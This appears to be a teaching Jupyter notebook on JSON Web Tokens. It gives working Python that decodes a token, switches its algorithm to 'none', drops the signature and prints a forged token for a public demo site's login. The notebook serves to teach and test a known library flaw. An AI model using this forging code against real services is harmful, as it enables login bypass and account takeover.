# JWT: JSON Web Tokens
_Author: Maurice Snoeren, CONCEPT VERSION 0.1_

This Jupyter notebook zooms into JSON Web Tokens (JWT) and the vulnerabilities of these JWT. 
- How JWT work?
- None vulnerablity - library attack
- Brute force vulnerability

## JWT underlying technologies
- JSON
- BASE64
- Signing

## Some usefull sites
- Check your JWT: https://jwt.io/
- Demo JWT hacking: http://demo.sjoerdlangkemper.nl/jwtdemo/hs256.php



In [8]:
import base64;
import json;

In [159]:
# This method converts a Python dict to a base64 string. While b64encode adds
# padding characters '=' to get multiples of four. The JWT wants these removed.
def dict_to_base64(d):
    j = json.dumps(d, separators=(',', ':'));
    return base64.b64encode(bytes(j, 'utf-8')).decode('utf-8').rstrip('=');

# This method converts a base64 string to a Python dict. The b64decode wants
# to have a multiple of four characters for the string, so padding characters
# = are added to the end of the string.
def base64_to_dict(b):
    padding = 4 - (len(b) % 4);
    return json.loads(base64.b64decode(b + ("=" * padding)));

In [161]:
# This method creates a JWT token, based on the header and payload. At this
# moment, not signature method has been implemented. The signature will become
# an empty string. However, using this method it is still possible to crack
# JWT token libraries that accept the 'none' algorithm.
def create_jwt(header, payload):
    return dict_to_base64(header) + "." + dict_to_base64(payload) + ".";

# This method decodes the JWT. Also the signature is not taken into account. It
# returns a Python dict that contains the header, payload and the signature.
def decode_jwt(jwt):
    (header, payload, signature) = jwt.split(".");
    return {
        "header": base64_to_dict(header),
        "payload": base64_to_dict(payload),
        "signature": signature
    };

In [163]:
# This method creates a new JWT token, based on the token jwt given to the
# method. It changes the algorith to non and returns the new token. When the
# library is vulnerable, this token can be user to log into the system at any
# time.
def create_none_jwt(jwt):
    data = decode_jwt(jwt);
    data['header']['alg'] = "none";
    return create_jwt(data['header'], data['payload']);

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJodHRwOi8vZGVtby5zam9lcmRsYW5na2VtcGVyLm5sLyIsImlhdCI6MTYwODMzODMzMSwiZXhwIjoxNjA4MzM4NDUxLCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.


In [164]:
# Hack a JWT token!
jwt = create_none_jwt(" eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLnNqb2VyZGxhbmdrZW1wZXIubmxcLyIsImlhdCI6MTYwODMzOTM3NSwiZXhwIjoxNjA4MzM5NDk1LCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.OWpFkKa8HOIXYQ9HRfyB4Uimg1-e-AXErkw_0TBuvsM");
print(jwt);

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJodHRwOi8vZGVtby5zam9lcmRsYW5na2VtcGVyLm5sLyIsImlhdCI6MTYwODMzOTM3NSwiZXhwIjoxNjA4MzM5NDk1LCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.
